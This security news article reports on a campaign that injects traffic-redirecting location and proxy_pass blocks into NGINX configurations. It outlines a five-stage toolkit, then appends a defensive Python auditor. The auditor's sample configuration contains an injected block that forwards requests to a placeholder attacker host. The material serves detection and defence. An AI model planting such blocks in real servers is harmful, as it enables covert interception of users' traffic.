Hackers compromise NGINX servers to redirect user traffic
Hackers Hijack NGINX Servers in Stealthy Traffic-Redirection Campaign
A sophisticated cyber-espionage operation has been uncovered, targeting NGINX web servers worldwide to covertly hijack user traffic and reroute it through attacker-controlled infrastructure. The campaign, discovered by researchers at DataDog Security Labs, represents a new breed of stealthy web compromise that blends seamlessly into legitimate traffic flows.
The NGINX Attack Vector
NGINX, the open-source software that powers millions of websites for traffic management, load balancing, and reverse proxying, has become the latest battleground in cyber warfare. Attackers are exploiting the very foundation of how modern web traffic operates, injecting malicious code directly into NGINX configuration files rather than exploiting vulnerabilities.
The threat actors have developed an automated, multi-stage toolkit that systematically compromises servers, with a particular focus on websites using Asian top-level domains (.in, .id, .pe, .bd, and .th) as well as government and educational institutions (.edu and .gov).
How the Attack Works
The malicious campaign operates through a sophisticated five-stage process that transforms compromised servers into silent traffic interceptors:
Stage 1 – Initial Compromise (zx.sh): The attacker’s entry point script downloads and executes subsequent stages. Remarkably, it includes fallback mechanisms that use raw TCP connections if standard tools like curl or wget are unavailable, ensuring the attack can proceed even in restricted environments.
Stage 2 – Baota Panel Targeting (bt.sh): This stage specifically targets NGINX configurations managed by the Baota hosting panel. The script intelligently selects injection templates based on the server’s domain name, carefully overwrites configurations, and reloads NGINX without causing service interruptions—a crucial detail that helps avoid detection.
Stage 3 – Comprehensive Configuration Scanning (4zdh.sh): The toolkit enumerates common NGINX configuration directories including sites-enabled, conf.d, and sites-available. It parses the files with csplit and awk to avoid corrupting them, and it detects previous injections by hashing configurations and recording them in a global mapping file. Each change is validated with nginx -t before being applied.
Stage 4 – Targeted Domain Focus (zdh.sh): This narrower approach concentrates primarily on /etc/nginx/sites-enabled configurations, with special emphasis on .in and .id domains. The process mirrors Stage 3’s careful validation but includes a forced restart (pkill) as a fallback mechanism.
Stage 5 – Data Exfiltration (ok.sh): The final stage scans all compromised configurations to build comprehensive maps of hijacked domains, injection templates, and proxy targets. This intelligence is then exfiltrated to a command-and-control server at 158.94.210[.]227, completing the attacker’s reconnaissance cycle.
The Stealth Mechanism
What makes this attack particularly dangerous is its invisibility. Rather than exploiting vulnerabilities, attackers hide malicious instructions within configuration files that administrators rarely scrutinize. The malicious code injects “location” blocks that capture incoming requests on attacker-selected URL paths, then rewrites them to include the full original URL before forwarding traffic via the “proxy_pass” directive to attacker-controlled domains.
The genius of this approach lies in its subtlety: user traffic still reaches its intended destination, often directly, making the detour through attacker infrastructure nearly impossible to detect without specific monitoring. Even more concerning, legitimate request headers such as “Host,” “X-Real-IP,” “User-Agent,” and “Referer” are preserved, making the traffic appear completely legitimate to both the destination server and any monitoring systems.
The Abuse of Legitimate Functionality
Attackers are weaponizing NGINX’s legitimate load-balancing capabilities. The “proxy_pass” directive, designed to improve performance and reliability by rerouting requests through alternative backend server groups, becomes a tool for traffic interception. Since this directive is commonly used in legitimate configurations, its abuse doesn’t trigger security alerts or raise suspicions.
Why This Matters
This campaign represents a significant evolution in web-based attacks. Traditional web attacks often involve exploiting vulnerabilities, defacement, or direct data theft. This operation is different—it’s about establishing persistent, covert access to web traffic flows for intelligence gathering, potential data interception, or as a stepping stone for further attacks.
The targeting of government and educational institutions suggests potential espionage motivations, while the focus on Asian domains indicates either regional targeting or attempts to compromise infrastructure in specific geopolitical areas.
Mitigation and Detection
Organizations running NGINX servers should implement several defensive measures:
- Regular auditing of NGINX configuration files for unauthorized “location” blocks or unexpected “proxy_pass” directives
- Implementation of file integrity monitoring to detect unauthorized changes to configuration files
- Network traffic analysis to identify unusual patterns or unexpected outbound connections
- Regular security assessments of hosting management panels like Baota
- Monitoring for connections to known malicious infrastructure, including the identified C2 server
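As an added example (not from the article or from DataDog's research), the following Python auditor implements the first two mitigation bullets against the injection pattern described above: it walks each "location" block, flags a "proxy_pass" whose host is outside an allowlist of known backends, flags a rewrite that embeds the original URL into the forwarded request, and fingerprints configuration files so they can be compared with a stored baseline. The sample configuration, the attacker hostname and the allowlist are constructed for illustration.

```python
import hashlib
import re
from pathlib import Path

# Constructed sample: one benign reverse-proxy block plus one block shaped like
# the injection the article describes (placeholder domain, not a real IoC).
SAMPLE_CONF = """
server {
    listen 80;
    server_name example.in;
    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
    }
    location /wp-login.php {
        rewrite ^ /?u=$scheme://$host$request_uri break;
        proxy_pass http://attacker-placeholder.example;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
    }
}
"""

LOCATION_RE = re.compile(r"location\s+([^\s{]+(?:\s+[^\s{]+)?)\s*\{")
PROXY_RE = re.compile(r"proxy_pass\s+(\S+?);")
# A rewrite that copies the original scheme/host/URI into the new request.
REWRITE_RE = re.compile(r"rewrite\s+[^;]*\$(?:request_uri|host|scheme)[^;]*;")


def _extract_block(text, start):
    """Return the body of the brace block whose '{' sits at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    return text[start + 1:]


def audit_config(text, trusted_hosts):
    """Return (location, proxy_pass target, reasons) for suspicious blocks."""
    findings = []
    for m in LOCATION_RE.finditer(text):
        body = _extract_block(text, m.end() - 1)
        for p in PROXY_RE.finditer(body):
            target = p.group(1)
            host = re.sub(r"^\w+://", "", target).split("/")[0].split(":")[0]
            reasons = []
            if host.startswith("$"):
                reasons.append("proxy_pass target is a variable")
            elif host not in trusted_hosts:
                reasons.append(f"proxy_pass to untrusted host {host}")
            if REWRITE_RE.search(body):
                reasons.append("rewrite embeds the original URL in the forwarded request")
            if reasons:
                findings.append((m.group(1).strip(), target, reasons))
    return findings


def config_fingerprints(paths):
    """SHA-256 per config file; diff against a saved baseline to spot tampering."""
    return {str(p): hashlib.sha256(Path(p).read_bytes()).hexdigest() for p in paths}
```

Run `audit_config` over every file under sites-enabled, conf.d and sites-available with your real backend allowlist, and treat any finding or fingerprint change as something to investigate rather than auto-revert.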
The Broader Implications
This attack underscores a critical reality in cybersecurity: the most dangerous threats often don’t involve flashy exploits or zero-day vulnerabilities. Instead, they exploit the trust we place in the tools and configurations that underpin our digital infrastructure. By manipulating legitimate functionality rather than breaking it, attackers can achieve their objectives while remaining hidden in plain sight.
As web infrastructure continues to evolve and become more complex, defenders must adapt their approaches to include not just vulnerability management and perimeter defense, but also deep visibility into configuration management and traffic flows. The NGINX hijacking campaign serves as a stark reminder that in the modern threat landscape, the configuration files themselves can become weapons.